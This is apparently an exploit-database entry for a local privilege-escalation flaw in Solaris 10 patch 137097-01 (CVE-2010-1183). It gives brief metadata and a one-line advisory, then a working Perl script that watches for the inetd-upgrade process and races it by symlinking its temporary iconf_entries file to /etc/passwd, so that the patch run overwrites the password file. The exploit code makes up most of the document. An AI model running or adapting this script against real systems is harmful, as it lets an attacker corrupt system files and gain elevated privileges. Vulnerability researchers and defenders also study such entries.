Solaris 10 Patch 137097-01 - Symlink Privilege Escalation

Author: Larry Cashdollar
type: local
platform: solaris
port: 
date_added: 2012-08-11 
date_updated: 2016-11-12 
verified: 0 
codes: OSVDB-85419;CVE-2010-1183 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/54919/info

Solaris 10 Patch 137097-01 is prone to a local privilege-escalation vulnerability.

Local attackers can exploit this issue to gain elevated privileges on affected computers.

#!/usr/bin/perl
$clobber = "/etc/passwd";
while(1) {
open ps,"ps -ef | grep -v grep |grep -v PID |";

while(<ps>) {
@args = split " ", $_;

if (/inetd-upgrade/) {
        print "Symlinking iconf_entries.$args[1] to  $clobber\n";
        symlink($clobber,"/tmp/iconf_entries.$args[1]");
        exit(1);
   }
 }

}